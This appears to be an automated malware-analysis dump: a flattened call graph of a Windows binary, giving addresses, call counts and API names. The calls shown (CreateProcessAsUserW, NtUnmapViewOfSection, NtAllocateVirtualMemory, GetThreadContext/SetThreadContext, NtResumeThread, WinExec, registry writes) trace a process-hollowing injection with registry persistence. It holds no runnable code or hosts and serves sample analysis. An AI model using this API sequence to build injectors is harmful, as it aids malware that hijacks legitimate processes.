ResumeThread 37023->37024 37026 2a04860 11 API calls 37024->37026 37027 2a189d0 20 API calls 37025->37027 37030 2a28d59 37026->37030 37028 2a2a2d3 37027->37028 37029 2a04860 11 API calls 37028->37029 37032 2a2a2f4 37029->37032 37031 2a047ec 11 API calls 37030->37031 37034 2a28d90 37031->37034 37033 2a047ec 11 API calls 37032->37033 37038 2a2a32b 37033->37038 37035 2a189d0 20 API calls 37034->37035 37036 2a28db4 37035->37036 37037 2a04860 11 API calls 37036->37037 37042 2a28dd5 37037->37042 37039 2a189d0 20 API calls 37038->37039 37040 2a2a34f 37039->37040 37041 2a04860 11 API calls 37040->37041 37044 2a2a370 37041->37044 37043 2a047ec 11 API calls 37042->37043 37046 2a28e0c 37043->37046 37045 2a047ec 11 API calls 37044->37045 37049 2a2a3a7 37045->37049 37047 2a189d0 20 API calls 37046->37047 37048 2a28e30 37047->37048 37050 2a04860 11 API calls 37048->37050 37051 2a189d0 20 API calls 37049->37051 37054 2a28e51 37050->37054 37052 2a2a3cb 37051->37052 37053 2a04860 11 API calls 37052->37053 37056 2a2a3ec 37053->37056 37055 2a047ec 11 API calls 37054->37055 37058 2a28e88 37055->37058 37057 2a047ec 11 API calls 37056->37057 37061 2a2a423 37057->37061 37059 2a189d0 20 API calls 37058->37059 37060 2a28eac CloseHandle 37059->37060 37062 2a04860 11 API calls 37060->37062 37063 2a189d0 20 API calls 37061->37063 37064 2a28ed8 37062->37064 37065 2a2a447 37063->37065 37066 2a047ec 11 API calls 37064->37066 37067 2a189d0 20 API calls 37065->37067 37068 2a28f0f 37066->37068 37069 2a2a47a 37067->37069 37070 2a189d0 20 API calls 37068->37070 37072 2a189d0 20 API calls 37069->37072 37071 2a28f33 37070->37071 37073 2a04860 11 API calls 37071->37073 37074 2a2a4ad 37072->37074 37075 2a28f54 37073->37075 37077 2a189d0 20 API calls 37074->37077 37076 2a047ec 11 API calls 37075->37076 37079 2a28f8b 37076->37079 37078 2a2a4e0 37077->37078 37080 2a189d0 20 API calls 37078->37080 37081 2a189d0 20 API calls 37079->37081 37082 2a2a513 37080->37082 37083 2a28faf 37081->37083 37084 2a04860 11 API calls 37082->37084 37085 2a04860 11 API calls 37083->37085 37086 2a2a534 37084->37086 37087 2a28fd0 37085->37087 37088 2a047ec 11 API calls 37086->37088 37089 2a047ec 11 API calls 37087->37089 37090 2a2a56b 37088->37090 37091 2a29007 37089->37091 37092 2a189d0 20 API calls 37090->37092 37093 2a189d0 20 API calls 37091->37093 37094 2a2a58f 37092->37094 37095 2a2902b 37093->37095 37096 2a04860 11 API calls 37094->37096 37097 2a04860 11 API calls 37095->37097 37098 2a2a5b0 37096->37098 37099 2a2904c 37097->37099 37100 2a047ec 11 API calls 37098->37100 37101 2a047ec 11 API calls 37099->37101 37103 2a2a5e7 37100->37103 37102 2a29083 37101->37102 37105 2a189d0 20 API calls 37102->37105 37104 2a189d0 20 API calls 37103->37104 37108 2a2a60b 37104->37108 37106 2a290a7 37105->37106 37107 2a04860 11 API calls 37106->37107 37110 2a290c8 37107->37110 37109 2a189d0 20 API calls 37108->37109 37112 2a2a63e 37109->37112 37111 2a047ec 11 API calls 37110->37111 37114 2a290ff 37111->37114 37113 2a189d0 20 API calls 37112->37113 37117 2a2a671 37113->37117 37115 2a189d0 20 API calls 37114->37115 37116 2a29123 37115->37116 37118 2a04860 11 API calls 37116->37118 37119 2a189d0 20 API calls 37117->37119 37120 2a29144 37118->37120 37121 2a2a6a4 37119->37121 37122 2a047ec 11 API calls 37120->37122 37123 2a189d0 20 API calls 37121->37123 37124 2a2917b 37122->37124 37125 2a2a6d7 37123->37125 37126 2a189d0 20 API calls 37124->37126 37129 2a189d0 20 API calls 37125->37129 37127 2a2919f 37126->37127 37128 2a04860 11 API calls 37127->37128 37132 2a291c0 37128->37132 37130 2a2a70a 37129->37130 37131 2a04860 11 API calls 37130->37131 37133 2a2a72b 37131->37133 37134 2a047ec 11 API calls 37132->37134 37135 2a047ec 11 API calls 37133->37135 37136 2a291f7 37134->37136 37137 2a2a762 37135->37137 37138 2a189d0 20 API calls 37136->37138 37140 2a189d0 20 API calls 37137->37140 37139 2a2921b 37138->37139 37793 2a1894c LoadLibraryW 37139->37793 37141 2a2a786 37140->37141 37143 2a04860 11 API calls 37141->37143 37147 2a2a7a7 37143->37147 37145 2a1894c 21 API calls 37146 2a2924e 37145->37146 37148 2a1894c 21 API calls 37146->37148 37150 2a047ec 11 API calls 37147->37150 37149 2a29262 37148->37149 37151 2a1894c 21 API calls 37149->37151 37155 2a2a7de 37150->37155 37152 2a29276 37151->37152 37153 2a1894c 21 API calls 37152->37153 37154 2a2928a 37153->37154 37156 2a1894c 21 API calls 37154->37156 37158 2a189d0 20 API calls 37155->37158 37157 2a2929e CloseHandle 37156->37157 37159 2a04860 11 API calls 37157->37159 37160 2a2a802 37158->37160 37162 2a292ca 37159->37162 37161 2a04860 11 API calls 37160->37161 37163 2a2a823 37161->37163 37164 2a047ec 11 API calls 37162->37164 37165 2a047ec 11 API calls 37163->37165 37166 2a29301 37164->37166 37167 2a2a85a 37165->37167 37168 2a189d0 20 API calls 37166->37168 37170 2a189d0 20 API calls 37167->37170 37169 2a29325 37168->37169 37171 2a04860 11 API calls 37169->37171 37172 2a2a87e 37170->37172 37174 2a29346 37171->37174 37173 2a04860 11 API calls 37172->37173 37176 2a2a89f 37173->37176 37175 2a047ec 11 API calls 37174->37175 37178 2a2937d 37175->37178 37177 2a047ec 11 API calls 37176->37177 37179 2a2a8d6 37177->37179 37180 2a189d0 20 API calls 37178->37180 37181 2a189d0 20 API calls 37179->37181 37180->36637 37182 2a2a8fa 37181->37182 37183 2a04860 11 API calls 37182->37183 37184 2a2a91b 37183->37184 37185 2a047ec 11 API calls 37184->37185 37186 2a2a952 37185->37186 37187 2a189d0 20 API calls 37186->37187 37188 2a2a976 37187->37188 37189 2a189d0 20 API calls 37188->37189 37190 2a2a985 37189->37190 37191 2a189d0 20 API calls 37190->37191 37192 2a2a994 37191->37192 37193 2a189d0 20 API calls 37192->37193 37194 2a2a9a3 37193->37194 37195 2a189d0 20 API calls 37194->37195 37196 2a2a9b2 37195->37196 37197 2a189d0 20 API calls 37196->37197 37198 2a2a9c1 37197->37198 37199 2a189d0 20 API calls 37198->37199 37200 2a2a9d0 37199->37200 37201 2a189d0 20 API calls 37200->37201 37202 2a2a9df 37201->37202 37203 2a189d0 20 API calls 37202->37203 37204 2a2a9ee 37203->37204 37205 2a189d0 20 API calls 37204->37205 37206 2a2a9fd 37205->37206 37207 2a189d0 20 API calls 37206->37207 37208 2a2aa0c 37207->37208 37209 2a189d0 20 API calls 37208->37209 37210 2a2aa1b 37209->37210 37211 2a189d0 20 API calls 37210->37211 37212 2a2aa2a 37211->37212 37213 2a189d0 20 API calls 37212->37213 37214 2a2aa39 37213->37214 37215 2a189d0 20 API calls 37214->37215 37216 2a2aa48 37215->37216 37217 2a189d0 20 API calls 37216->37217 37218 2a2aa57 37217->37218 37219 2a04860 11 API calls 37218->37219 37220 2a2aa78 37219->37220 37221 2a047ec 11 API calls 37220->37221 37222 2a2aaaf 37221->37222 37223 2a189d0 20 API calls 37222->37223 37224 2a2aad3 37223->37224 37225 2a189d0 20 API calls 37224->37225 37226 2a2ab06 37225->37226 37227 2a189d0 20 API calls 37226->37227 37228 2a2ab39 37227->37228 37229 2a189d0 20 API calls 37228->37229 37230 2a2ab6c 37229->37230 37231 2a189d0 20 API calls 37230->37231 37232 2a2ab9f 37231->37232 37233 2a189d0 20 API calls 37232->37233 37234 2a2abd2 37233->37234 37235 2a189d0 20 API calls 37234->37235 37236 2a2ac05 37235->37236 37237 2a189d0 20 API calls 37236->37237 37238 2a2ac38 37237->37238 37239 2a04860 11 API calls 37238->37239 37240 2a2ac59 37239->37240 37241 2a047ec 11 API calls 37240->37241 37242 2a2ac90 37241->37242 37243 2a189d0 20 API calls 37242->37243 37244 2a2acb4 37243->37244 37245 2a04860 11 API calls 37244->37245 37246 2a2acd5 37245->37246 37247 2a047ec 11 API calls 37246->37247 37248 2a2ad0c 37247->37248 37249 2a189d0 20 API calls 37248->37249 37250 2a2ad30 37249->37250 37251 2a04860 11 API calls 37250->37251 37252 2a2ad51 37251->37252 37253 2a047ec 11 API calls 37252->37253 37254 2a2ad88 37253->37254 37255 2a189d0 20 API calls 37254->37255 37256 2a2adac 37255->37256 37257 2a189d0 20 API calls 37256->37257 37258 2a2addf 37257->37258 37259 2a189d0 20 API calls 37258->37259 37260 2a2ae12 37259->37260 37261 2a189d0 20 API calls 37260->37261 37262 2a2ae45 37261->37262 37263 2a189d0 20 API calls 37262->37263 37264 2a2ae78 37263->37264 37265 2a189d0 20 API calls 37264->37265 37266 2a2aeab 37265->37266 37267 2a189d0 20 API calls 37266->37267 37268 2a2aede 37267->37268 37269 2a189d0 20 API calls 37268->37269 37270 2a2af11 37269->37270 37271 2a189d0 20 API calls 37270->37271 37272 2a2af44 37271->37272 37273 2a189d0 20 API calls 37272->37273 37274 2a2af77 37273->37274 37275 2a189d0 20 API calls 37274->37275 37276 2a2afaa 37275->37276 37277 2a189d0 20 API calls 37276->37277 37278 2a2afdd 37277->37278 37279 2a189d0 20 API calls 37278->37279 37280 2a2b010 37279->37280 37281 2a189d0 20 API calls 37280->37281 37282 2a2b043 37281->37282 37283 2a189d0 20 API calls 37282->37283 37284 2a2b076 37283->37284 37285 2a189d0 20 API calls 37284->37285 37286 2a2b0a9 37285->37286 37287 2a189d0 20 API calls 37286->37287 37288 2a2b0dc 37287->37288 37289 2a189d0 20 API calls 37288->37289 37290 2a2b10f 37289->37290 37291 2a189d0 20 API calls 37290->37291 37292 2a2b142 37291->37292 37293 2a189d0 20 API calls 37292->37293 37294 2a2b175 37293->37294 37295 2a18338 18 API calls 37294->37295 37296 2a2b184 37295->37296 37297 2a04860 11 API calls 37296->37297 37298 2a2b1a5 37297->37298 37299 2a047ec 11 API calls 37298->37299 37300 2a2b1dc 37299->37300 37301 2a189d0 20 API calls 37300->37301 37302 2a2b200 37301->37302 37303 2a04860 11 API calls 37302->37303 37304 2a2b221 37303->37304 37305 2a047ec 11 API calls 37304->37305 37306 2a2b258 37305->37306 37307 2a189d0 20 API calls 37306->37307 37308 2a2b27c 37307->37308 37309 2a04860 11 API calls 37308->37309 37310 2a2b29d 37309->37310 37311 2a047ec 11 API calls 37310->37311 37312 2a2b2d4 37311->37312 37313 2a189d0 20 API calls 37312->37313 37314 2a2b2f8 ExitProcess 37313->37314 37321 2a1e114 37315->37321 37316 2a1e197 37317 2a044dc 11 API calls 37316->37317 37319 2a1e19f 37317->37319 37318 2a049f8 11 API calls 37318->37321 37320 2a04530 11 API calls 37319->37320 37322 2a1e1aa 37320->37322 37321->37316 37321->37318 37323 2a04500 11 API calls 37322->37323 37324 2a1e1c4 37323->37324 37324->36528 37326 2a1f22b 37325->37326 37327 2a1f256 RegOpenKeyA 37326->37327 37328 2a1f264 37327->37328 37329 2a049f8 11 API calls 37328->37329 37330 2a1f27c 37329->37330 37331 2a1f289 RegSetValueExA RegCloseKey 37330->37331 37332 2a1f2ad 37331->37332 37333 2a04500 11 API calls 37332->37333 37334 2a1f2ba 37333->37334 37335 2a044dc 11 API calls 37334->37335 37336 2a1f2c2 37335->37336 37336->36531 37342 2a1f0b9 37337->37342 37338 2a1f0e5 37339 2a044dc 11 API calls 37338->37339 37341 2a1f0fa 37339->37341 37341->36789 37342->37338 37800 2a046c4 11 API calls 37342->37800 37801 2a04530 11 API calls 37342->37801 37802 2a049a0 37344->37802 37347 2a07e71 37347->36853 37347->36856 37349 2a04bcc 11 API calls 37348->37349 37351 2a1e370 37349->37351 37350 2a1e391 37350->36952 37351->37350 37352 2a049f8 11 API calls 37351->37352 37352->37351 37354 2a1dca2 37353->37354 37804 2a04f20 37354->37804 37356 2a1dcaa 37357 2a1dcca RtlDosPathNameToNtPathName_U 37356->37357 37808 2a1dbdc 37357->37808 37359 2a1dce6 NtCreateFile 37360 2a1dd11 37359->37360 37361 2a049f8 11 API calls 37360->37361 37362 2a1dd23 NtWriteFile NtClose 37361->37362 37363 2a1dd4d 37362->37363 37809 2a04c60 37363->37809 37366 2a044dc 11 API calls 37367 2a1dd5d 37366->37367 37367->36853 37369 2a049ac 37368->37369 37370 2a049e7 37369->37370 37371 2a045a0 11 API calls 37369->37371 37374 2a18d70 37370->37374 37372 2a049c3 37371->37372 37372->37370 37373 2a02c2c 11 API calls 37372->37373 37373->37370 37375 2a18d78 37374->37375 37376 2a04860 11 API calls 37375->37376 37377 2a18dbb 37376->37377 37378 2a047ec 11 API calls 37377->37378 37379 2a18de0 37378->37379 37380 2a189d0 20 API calls 37379->37380 37381 2a18dfb 37380->37381 37382 2a04860 11 API calls 37381->37382 37383 2a18e14 37382->37383 37384 2a047ec 11 API calls 37383->37384 37385 2a18e39 37384->37385 37386 2a189d0 20 API calls 37385->37386 37387 2a18e54 37386->37387 37388 2a1a8b7 37387->37388 37389 2a04860 11 API calls 37387->37389 37390 2a04500 11 API calls 37388->37390 37393 2a18e85 37389->37393 37391 2a1a8d4 37390->37391 37392 2a04500 11 API calls 37391->37392 37394 2a1a8e4 37392->37394 37397 2a047ec 11 API calls 37393->37397 37395 2a04c60 SysFreeString 37394->37395 37396 2a1a8ef 37395->37396 37398 2a04500 11 API calls 37396->37398 37401 2a18eaa 37397->37401 37399 2a1a8ff 37398->37399 37400 2a044dc 11 API calls 37399->37400 37402 2a1a907 37400->37402 37404 2a189d0 20 API calls 37401->37404 37403 2a04500 11 API calls 37402->37403 37405 2a1a914 37403->37405 37406 2a18ec5 37404->37406 37407 2a04500 11 API calls 37405->37407 37408 2a04860 11 API calls 37406->37408 37409 2a1a921 37407->37409 37410 2a18ede 37408->37410 37409->36699 37411 2a047ec 11 API calls 37410->37411 37412 2a18f03 37411->37412 37413 2a189d0 20 API calls 37412->37413 37414 2a18f1e 37413->37414 37414->37388 37415 2a04860 11 API calls 37414->37415 37416 2a18f66 37415->37416 37417 2a047ec 11 API calls 37416->37417 37418 2a18f8b 37417->37418 37419 2a189d0 20 API calls 37418->37419 37420 2a18fa6 37419->37420 37421 2a04860 11 API calls 37420->37421 37422 2a18fbf 37421->37422 37423 2a047ec 11 API calls 37422->37423 37424 2a18fe4 37423->37424 37425 2a189d0 20 API calls 37424->37425 37426 2a18fff 37425->37426 37427 2a04860 11 API calls 37426->37427 37428 2a19044 37427->37428 37429 2a047ec 11 API calls 37428->37429 37430 2a19069 37429->37430 37431 2a189d0 20 API calls 37430->37431 37432 2a19084 37431->37432 37433 2a04860 11 API calls 37432->37433 37434 2a1909d 37433->37434 37435 2a047ec 11 API calls 37434->37435 37436 2a190c5 37435->37436 37437 2a189d0 20 API calls 37436->37437 37438 2a190e3 37437->37438 37439 2a04860 11 API calls 37438->37439 37440 2a190ff 37439->37440 37441 2a047ec 11 API calls 37440->37441 37442 2a19130 37441->37442 37443 2a189d0 20 API calls 37442->37443 37444 2a19154 37443->37444 37445 2a04860 11 API calls 37444->37445 37446 2a19170 37445->37446 37447 2a047ec 11 API calls 37446->37447 37448 2a191a1 37447->37448 37449 2a189d0 20 API calls 37448->37449 37450 2a191c5 37449->37450 37451 2a04860 11 API calls 37450->37451 37452 2a191e1 37451->37452 37453 2a047ec 11 API calls 37452->37453 37454 2a19212 37453->37454 37455 2a189d0 20 API calls 37454->37455 37456 2a19236 37455->37456 37812 2a18788 37456->37812 37459 2a192e8 37460 2a04860 11 API calls 37459->37460 37462 2a19304 37460->37462 37461 2a04860 11 API calls 37463 2a19293 37461->37463 37464 2a047ec 11 API calls 37462->37464 37465 2a047ec 11 API calls 37463->37465 37466 2a19335 37464->37466 37467 2a192c4 37465->37467 37468 2a189d0 20 API calls 37466->37468 37469 2a189d0 20 API calls 37467->37469 37470 2a19359 37468->37470 37469->37459 37471 2a189d0 20 API calls 37470->37471 37472 2a1938c 37471->37472 37473 2a04860 11 API calls 37472->37473 37474 2a193a8 37473->37474 37475 2a047ec 11 API calls 37474->37475 37476 2a193d9 37475->37476 37477 2a189d0 20 API calls 37476->37477 37478 2a193fd 37477->37478 37479 2a04860 11 API calls 37478->37479 37480 2a19419 37479->37480 37481 2a047ec 11 API calls 37480->37481 37482 2a1944a 37481->37482 37483 2a189d0 20 API calls 37482->37483 37484 2a1946e 37483->37484 37485 2a02ee0 2 API calls 37484->37485 37486 2a19473 37485->37486 37487 2a04860 11 API calls 37486->37487 37488 2a194b6 37487->37488 37489 2a047ec 11 API calls 37488->37489 37490 2a194e7 37489->37490 37491 2a189d0 20 API calls 37490->37491 37492 2a1950b 37491->37492 37493 2a04860 11 API calls 37492->37493 37494 2a19527 37493->37494 37495 2a047ec 11 API calls 37494->37495 37496 2a19558 37495->37496 37497 2a189d0 20 API calls 37496->37497 37498 2a1957c 37497->37498 37499 2a04860 11 API calls 37498->37499 37500 2a19598 37499->37500 37501 2a047ec 11 API calls 37500->37501 37502 2a195c9 37501->37502 37503 2a189d0 20 API calls 37502->37503 37504 2a195ed GetThreadContext 37503->37504 37504->37388 37505 2a1960f 37504->37505 37506 2a04860 11 API calls 37505->37506 37507 2a1962b 37506->37507 37508 2a047ec 11 API calls 37507->37508 37509 2a1965c 37508->37509 37510 2a189d0 20 API calls 37509->37510 37511 2a19680 37510->37511 37512 2a04860 11 API calls 37511->37512 37513 2a1969c 37512->37513 37514 2a047ec 11 API calls 37513->37514 37515 2a196cd 37514->37515 37516 2a189d0 20 API calls 37515->37516 37517 2a196f1 37516->37517 37518 2a04860 11 API calls 37517->37518 37519 2a1970d 37518->37519 37520 2a047ec 11 API calls 37519->37520 37521 2a1973e 37520->37521 37522 2a189d0 20 API calls 37521->37522 37523 2a19762 37522->37523 37524 2a04860 11 API calls 37523->37524 37525 2a1977e 37524->37525 37526 2a047ec 11 API calls 37525->37526 37527 2a197af 37526->37527 37528 2a189d0 20 API calls 37527->37528 37529 2a197d3 37528->37529 37530 2a04860 11 API calls 37529->37530 37531 2a197ef 37530->37531 37532 2a047ec 11 API calls 37531->37532 37533 2a19820 37532->37533 37534 2a189d0 20 API calls 37533->37534 37535 2a19844 37534->37535 37824 2a18400 37535->37824 37538 2a19878 37540 2a04860 11 API calls 37538->37540 37539 2a19b7f 37541 2a04860 11 API calls 37539->37541 37543 2a19894 37540->37543 37542 2a19b9b 37541->37542 37544 2a047ec 11 API calls 37542->37544 37545 2a047ec 11 API calls 37543->37545 37547 2a19bcc 37544->37547 37546 2a198c5 37545->37546 37548 2a189d0 20 API calls 37546->37548 37549 2a189d0 20 API calls 37547->37549 37615 2a19b78 37547->37615 37550 2a198e9 37548->37550 37549->37615 37552 2a04860 11 API calls 37550->37552 37551 2a04860 11 API calls 37553 2a19c0c 37551->37553 37554 2a19905 37552->37554 37555 2a047ec 11 API calls 37553->37555 37556 2a047ec 11 API calls 37554->37556 37557 2a19c3d 37555->37557 37558 2a19936 37556->37558 37559 2a189d0 20 API calls 37557->37559 37560 2a189d0 20 API calls 37558->37560 37561 2a19c61 37559->37561 37562 2a1995a 37560->37562 37563 2a04860 11 API calls 37561->37563 37564 2a04860 11 API calls 37562->37564 37565 2a19c7d 37563->37565 37566 2a19976 37564->37566 37567 2a047ec 11 API calls 37565->37567 37568 2a047ec 11 API calls 37566->37568 37569 2a19cae 37567->37569 37570 2a199a7 37568->37570 37571 2a189d0 20 API calls 37569->37571 37572 2a189d0 20 API calls 37570->37572 37573 2a19cd2 37571->37573 37574 2a199cb 37572->37574 37575 2a04860 11 API calls 37573->37575 37838 2a18670 37574->37838 37582 2a19cee 37575->37582 37578 2a199e3 37852 2a17a2c 37578->37852 37579 2a19a0b 37580 2a04860 11 API calls 37579->37580 37586 2a19a27 37580->37586 37584 2a047ec 11 API calls 37582->37584 37583 2a19a04 37585 2a04860 11 API calls 37583->37585 37588 2a19d1f 37584->37588 37589 2a19a98 37585->37589 37587 2a047ec 11 API calls 37586->37587 37594 2a19a58 37587->37594 37590 2a189d0 20 API calls 37588->37590 37592 2a047ec 11 API calls 37589->37592 37591 2a19d43 37590->37591 37593 2a17a2c 18 API calls 37591->37593 37597 2a19ac9 37592->37597 37595 2a19d64 37593->37595 37594->37583 37596 2a189d0 20 API calls 37594->37596 37595->37388 37598 2a04860 11 API calls 37595->37598 37596->37583 37599 2a189d0 20 API calls 37597->37599 37602 2a19d92 37598->37602 37600 2a19aed 37599->37600 37601 2a04860 11 API calls 37600->37601 37604 2a19b09 37601->37604 37603 2a047ec 11 API calls 37602->37603 37606 2a19dc3 37603->37606 37605 2a047ec 11 API calls 37604->37605 37609 2a19b3a 37605->37609 37607 2a189d0 20 API calls 37606->37607 37608 2a19de7 37607->37608 37610 2a04860 11 API calls 37608->37610 37611 2a189d0 20 API calls 37609->37611 37614 2a19e03 37610->37614 37612 2a19b5e 37611->37612 37613 2a17a2c 18 API calls 37612->37613 37613->37615 37616 2a047ec 11 API calls 37614->37616 37615->37551 37617 2a19e34 37616->37617 37618 2a189d0 20 API calls 37617->37618 37619 2a19e58 37618->37619 37866 2a18c80 37619->37866 37621 2a04860 11 API calls 37623 2a19edf 37621->37623 37622 2a19e5f 37622->37621 37624 2a047ec 11 API calls 37623->37624 37625 2a19f10 37624->37625 37626 2a189d0 20 API calls 37625->37626 37627 2a19f34 37626->37627 37628 2a04860 11 API calls 37627->37628 37629 2a19f50 37628->37629 37630 2a047ec 11 API calls 37629->37630 37631 2a19f81 37630->37631 37632 2a189d0 20 API calls 37631->37632 37633 2a19fa5 37632->37633 37634 2a04860 11 API calls 37633->37634 37635 2a19fc1 37634->37635 37636 2a047ec 11 API calls 37635->37636 37637 2a19ff2 37636->37637 37638 2a189d0 20 API calls 37637->37638 37639 2a1a016 37638->37639 37640 2a17d78 18 API calls 37639->37640 37641 2a1a033 37640->37641 37642 2a04860 11 API calls 37641->37642 37643 2a1a04f 37642->37643 37644 2a047ec 11 API calls 37643->37644 37645 2a1a080 37644->37645 37646 2a189d0 20 API calls 37645->37646 37647 2a1a0a4 37646->37647 37648 2a04860 11 API calls 37647->37648 37649 2a1a0c0 37648->37649 37650 2a047ec 11 API calls 37649->37650 37651 2a1a0f1 37650->37651 37652 2a189d0 20 API calls 37651->37652 37653 2a1a115 37652->37653 37654 2a04860 11 API calls 37653->37654 37655 2a1a131 37654->37655 37656 2a047ec 11 API calls 37655->37656 37657 2a1a162 37656->37657 37658 2a189d0 20 API calls 37657->37658 37659 2a1a186 37658->37659 37660 2a17d78 18 API calls 37659->37660 37661 2a1a1a6 37660->37661 37662 2a04860 11 API calls 37661->37662 37663 2a1a1c2 37662->37663 37664 2a047ec 11 API calls 37663->37664 37665 2a1a1f3 37664->37665 37666 2a189d0 20 API calls 37665->37666 37667 2a1a217 37666->37667 37668 2a04860 11 API calls 37667->37668 37669 2a1a233 37668->37669 37670 2a047ec 11 API calls 37669->37670 37671 2a1a264 37670->37671 37672 2a189d0 20 API calls 37671->37672 37673 2a1a288 37672->37673 37674 2a04860 11 API calls 37673->37674 37675 2a1a2a4 37674->37675 37676 2a047ec 11 API calls 37675->37676 37677 2a1a2d5 37676->37677 37678 2a189d0 20 API calls 37677->37678 37679 2a1a2f9 SetThreadContext NtResumeThread 37678->37679 37680 2a04860 11 API calls 37679->37680 37681 2a1a345 37680->37681 37682 2a047ec 11 API calls 37681->37682 37683 2a1a376 37682->37683 37684 2a189d0 20 API calls 37683->37684 37685 2a1a39a 37684->37685 37686 2a04860 11 API calls 37685->37686 37687 2a1a3b6 37686->37687 37688 2a047ec 11 API calls 37687->37688 37689 2a1a3e7 37688->37689 37690 2a189d0 20 API calls 37689->37690 37691 2a1a40b 37690->37691 37692 2a04860 11 API calls 37691->37692 37693 2a1a427 37692->37693 37694 2a047ec 11 API calls 37693->37694 37695 2a1a458 37694->37695 37696 2a189d0 20 API calls 37695->37696 37697 2a1a47c 37696->37697 37698 2a04860 11 API calls 37697->37698 37699 2a1a498 37698->37699 37700 2a047ec 11 API calls 37699->37700 37701 2a1a4c9 37700->37701 37702 2a189d0 20 API calls 37701->37702 37703 2a1a4ed 37702->37703 37704 2a02c2c 11 API calls 37703->37704 37705 2a1a4fc 37704->37705 37706 2a04860 11 API calls 37705->37706 37707 2a1a51e 37706->37707 37708 2a047ec 11 API calls 37707->37708 37709 2a1a54f 37708->37709 37710 2a189d0 20 API calls 37709->37710 37711 2a1a573 37710->37711 37712 2a1894c 21 API calls 37711->37712 37713 2a1a587 37712->37713 37714 2a1894c 21 API calls 37713->37714 37715 2a1a59b 37714->37715 37716 2a1894c 21 API calls 37715->37716 37717 2a1a5af 37716->37717 37718 2a04860 11 API calls 37717->37718 37719 2a1a5cb 37718->37719 37720 2a047ec 11 API calls 37719->37720 37721 2a1a5fc 37720->37721 37722 2a189d0 20 API calls 37721->37722 37723 2a1a620 37722->37723 37724 2a1894c 21 API calls 37723->37724 37725 2a1a634 37724->37725 37726 2a1894c 21 API calls 37725->37726 37727 2a1a648 37726->37727 37728 2a04860 11 API calls 37727->37728 37729 2a1a664 37728->37729 37730 2a047ec 11 API calls 37729->37730 37731 2a1a682 37730->37731 37732 2a1894c 21 API calls 37731->37732 37733 2a1a69a 37732->37733 37734 2a04860 11 API calls 37733->37734 37735 2a1a6b6 37734->37735 37736 2a047ec 11 API calls 37735->37736 37737 2a1a6d4 37736->37737 37738 2a1894c 21 API calls 37737->37738 37739 2a1a6ec 37738->37739 37740 2a1894c 21 API calls 37739->37740 37741 2a1a700 37740->37741 37742 2a1894c 21 API calls 37741->37742 37743 2a1a714 37742->37743 37744 2a1894c 21 API calls 37743->37744 37745 2a1a728 37744->37745 37746 2a1894c 21 API calls 37745->37746 37747 2a1a73c 37746->37747 37748 2a04860 11 API calls 37747->37748 37749 2a1a758 37748->37749 37750 2a047ec 11 API calls 37749->37750 37751 2a1a776 37750->37751 37752 2a1894c 21 API calls 37751->37752 37753 2a1a78e 37752->37753 37754 2a04860 11 API calls 37753->37754 37755 2a1a7aa 37754->37755 37756 2a047ec 11 API calls 37755->37756 37757 2a1a7c8 37756->37757 37758 2a1894c 21 API calls 37757->37758 37759 2a1a7e0 37758->37759 37760 2a04860 11 API calls 37759->37760 37761 2a1a7fc 37760->37761 37762 2a047ec 11 API calls 37761->37762 37763 2a1a81a 37762->37763 37764 2a1894c 21 API calls 37763->37764 37765 2a1a832 37764->37765 37766 2a04860 11 API calls 37765->37766 37767 2a1a84e 37766->37767 37768 2a047ec 11 API calls 37767->37768 37769 2a1a86c 37768->37769 37770 2a1894c 21 API calls 37769->37770 37771 2a1a884 37770->37771 37772 2a1894c 21 API calls 37771->37772 37773 2a1a8a3 37772->37773 37774 2a1894c 21 API calls 37773->37774 37774->37388 37776 2a04530 11 API calls 37775->37776 37777 2a185df 37776->37777 37778 2a04860 11 API calls 37777->37778 37779 2a185fe 37778->37779 37780 2a181cc 17 API calls 37779->37780 37781 2a18611 37780->37781 37782 2a18274 15 API calls 37781->37782 37783 2a18617 WinExec 37782->37783 37784 2a18639 37783->37784 37785 2a044dc 11 API calls 37784->37785 37786 2a18641 37785->37786 37786->36630 37787->36688 37788->36846 37789->36901 37790->37022 37791->36852 37792->36946 37794 2a18973 GetProcAddress 37793->37794 37795 2a189bb 37793->37795 37796 2a189b0 FreeLibrary 37794->37796 37797 2a1898d 37794->37797 37795->37145 37796->37795 37798 2a17d78 18 API calls 37797->37798 37799 2a189a5 37798->37799 37799->37796 37800->37342 37801->37342 37803 2a049a4 GetFileAttributesA 37802->37803 37803->37347 37805 2a04f26 SysAllocStringLen 37804->37805 37806 2a04f3c 37804->37806 37805->37806 37807 2a04c30 37805->37807 37806->37356 37807->37804 37808->37359 37810 2a04c74 37809->37810 37811 2a04c66 SysFreeString 37809->37811 37810->37366 37811->37810 37813 2a04530 11 API calls 37812->37813 37814 2a187ab 37813->37814 37815 2a04860 11 API calls 37814->37815 37816 2a187ca 37815->37816 37817 2a181cc 17 API calls 37816->37817 37818 2a187dd 37817->37818 37819 2a18274 15 API calls 37818->37819 37820 2a187e3 CreateProcessAsUserW 37819->37820 37821 2a18827 37820->37821 37822 2a044dc 11 API calls 37821->37822 37823 2a1882f 37822->37823 37823->37459 37823->37461 37825 2a04530 11 API calls 37824->37825 37826 2a18425 37825->37826 37827 2a1798c 12 API calls 37826->37827 37828 2a18432 37827->37828 37829 2a047ec 11 API calls 37828->37829 37830 2a1843f 37829->37830 37831 2a181cc 17 API calls 37830->37831 37832 2a18452 37831->37832 37833 2a18274 15 API calls 37832->37833 37834 2a18458 NtReadVirtualMemory 37833->37834 37835 2a18486 37834->37835 37836 2a04500 11 API calls 37835->37836 37837 2a18493 37836->37837 37837->37538 37837->37539 37839 2a04530 11 API calls 37838->37839 37840 2a18695 37839->37840 37841 2a1798c 12 API calls 37840->37841 37842 2a186a2 37841->37842 37843 2a047ec 11 API calls 37842->37843 37844 2a186af 37843->37844 37845 2a181cc 17 API calls 37844->37845 37846 2a186c2 37845->37846 37847 2a18274 15 API calls 37846->37847 37848 2a186c8 NtUnmapViewOfSection 37847->37848 37849 2a186e8 37848->37849 37850 2a04500 11 API calls 37849->37850 37851 2a186f5 37850->37851 37851->37578 37851->37579 37853 2a04530 11 API calls 37852->37853 37854 2a17a51 37853->37854 37855 2a1798c 12 API calls 37854->37855 37856 2a17a5e 37855->37856 37857 2a047ec 11 API calls 37856->37857 37858 2a17a6b 37857->37858 37859 2a181cc 17 API calls 37858->37859 37860 2a17a7e 37859->37860 37861 2a18274 15 API calls 37860->37861 37862 2a17a84 NtAllocateVirtualMemory 37861->37862 37863 2a17ab5 37862->37863 37864 2a04500 11 API calls 37863->37864 37865 2a17ac2 37864->37865 37865->37583 37867 2a02c10 11 API calls 37866->37867 37868 2a18cb6 37867->37868 37868->37622 37869 